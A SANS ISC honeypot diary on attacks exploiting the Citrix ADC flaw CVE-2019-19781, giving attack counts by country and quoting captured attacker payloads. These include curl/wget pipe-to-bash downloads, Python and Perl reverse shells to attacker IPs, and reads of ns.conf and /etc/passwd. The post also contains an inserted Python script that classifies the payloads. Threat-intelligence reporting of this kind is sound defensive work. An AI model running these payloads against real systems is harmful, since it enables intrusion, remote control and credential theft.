
Citrix ADC Exploits Update

Published: 2020-01-20
Last Updated: 2020-01-20 04:21:38 UTC
by Renato Marinho (Version: 1)

In today's diary, I am summarizing the current state of attacks exploiting the Citrix ADC vulnerability (CVE-2019-19781), using data from our SANS ISC honeypots. Our first two posts about this topic are here: [1] [2].

We are looking here at data collected during the first 10 days after the exploit was made public [3]. During this time, we registered more than 550,000 attack attempts against our honeypots. The highest volume was registered on Jan 12, just two days after the first exploit: 290,000 attack attempts, generated by 532 IP addresses located in 42 countries.

Take a look at the source of the attacks on the map below.

As you may have noticed, the vast majority of attacks originate from Russia. Hosts in Russia are responsible for 455,000 attempts or 82% of the total.

Histogram of Attacks by Country

Payload Overview

Regarding the payloads used by the attackers, we observed 141 variants. Given the commands issued on the victim’s machine, we could infer that most of them are part of automated attacks that download and execute scripts, like “exec(\'curl+185[.]178.45.221/|+sh\');”, or that simply collect data, like “print+`cat+/flash/nsconfig/ns.conf`”.

However, we also noticed reverse connection payloads that often require attacker interaction. In those scenarios, the possibilities for the attacker are huge, as they may manually interact with the system, look for interesting data and look for ways to pivot to other segments on the victim’s network.

Most of the reverse connection payloads were written in Python, like this one:

/var/python/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("185[.]10.68.25",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

But a few were written in Perl:

perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"195[.]123.238.91:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

We were able to connect to a couple of the endpoints via telnet and netcat. Most of these connections failed. But in some cases, we ended up with a connection and someone typing standard Unix commands like "id", "ls" and "uname". The speed suggests that these commands were typed manually. But we were not able to keep up the ruse long enough to get to any interesting commands.

The top 10 payloads and their respective counts are shown in the table below:












(curl -fsSL https://pastebin[.]com/raw/2zds3h2T||wget -q -O -|bash; id


exec(\'cat /flash/nsconfig/ns.conf | tee /netscaler/portal/templates/yVStWwCFy9BDXBxjIGvCk3h67Gx4Zm8E.xml\');


cat /etc/passwd


/var/python/bin/python -c 'import urllib;exec(urllib.urlopen("http://185[.]178.45.221/").read())'


exec(\'whoami | tee /netscaler/portal/templates/.xml\');


(curl -s https://pastebin[.]com/raw/d3SY1erQ||wget -q -O -|bash; cat /etc/passwd
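
One way to triage captured payloads into the groups this diary describes (download-and-execute, data collection, reverse connection) and to tally the defanged hosts they reference. This is an added example, not ISC's own tooling: the regex rules and function names are assumptions, and the sample strings are copied or abridged from the payloads quoted in this diary.

```python
import re
from collections import Counter

# Payload strings copied or abridged from this diary; indicators stay defanged.
SAMPLES = [
    r"exec(\'curl+185[.]178.45.221/|+sh\');",
    r"print+`cat+/flash/nsconfig/ns.conf`",
    r"""/var/python/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("185[.]10.68.25",80));""",
    r"""perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"195[.]123.238.91:443");""",
    r"(curl -fsSL https://pastebin[.]com/raw/2zds3h2T||wget -q -O -|bash; id",
    r"cat /etc/passwd",
    r"""/var/python/bin/python -c 'import urllib;exec(urllib.urlopen("http://185[.]178.45.221/").read())'""",
    r"exec(\'whoami | tee /netscaler/portal/templates/.xml\');",
]

# First match wins, so a reverse shell that also runs "id" is not miscounted.
RULES = [
    ("reverse_shell", re.compile(r"socket\.socket\(|IO::Socket::INET")),
    ("download_and_execute", re.compile(
        r"\b(?:curl|wget)\b[^;]*\|\s*(?:ba)?sh\b|exec\(urllib\.urlopen\(")),
    ("data_collection", re.compile(
        r"ns\.conf|/etc/passwd|\b(?:whoami|id|uname)\b")),
]
DEFANGED = re.compile(r"[\w-]+\[\.\][\w.-]+")  # e.g. 185[.]178.45.221

def classify(payload):
    """Return the first matching category label, or 'other'."""
    text = payload.replace("+", " ")  # some payloads carry spaces as '+'
    for label, rule in RULES:
        if rule.search(text):
            return label
    return "other"

def defanged_hosts(payload):
    """Return the defanged hosts/IPs referenced by one payload."""
    return DEFANGED.findall(payload)

def summarize(payloads):
    """Count payloads per category and references per defanged host."""
    counts = Counter(classify(p) for p in payloads)
    hosts = Counter(h for p in payloads for h in defanged_hosts(p))
    return counts, hosts

if __name__ == "__main__":
    counts, hosts = summarize(SAMPLES)
    print(counts.most_common())
    print(hosts.most_common())
```
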



“Patching” Payload

From the list above, the fifth one caught our attention. It is especially interesting because:

  • After downloading and executing its malicious action from a Pastebin address, it applies a patch to “” file – possibly to avoid competitors;
  • The Pastebin content pointed to by the payload, which supposedly contains the malicious action, had been removed when we tried to check it two days ago.

Thus, depending on when the Pastebin address with the malicious content was removed, this campaign may have just patched vulnerable installations. It’s worth mentioning that the fix applied by this payload is partial and does not patch all possible vulnerable files.



In the figure below it’s possible to see the moment the “patching” payload reached our honeypots.

We will continue to monitor Citrix ADC exploitation and give you more updates. If you saw something else interesting about this vulnerability, please let us know!



Renato Marinho
Morphus Labs| LinkedIn|Twitter
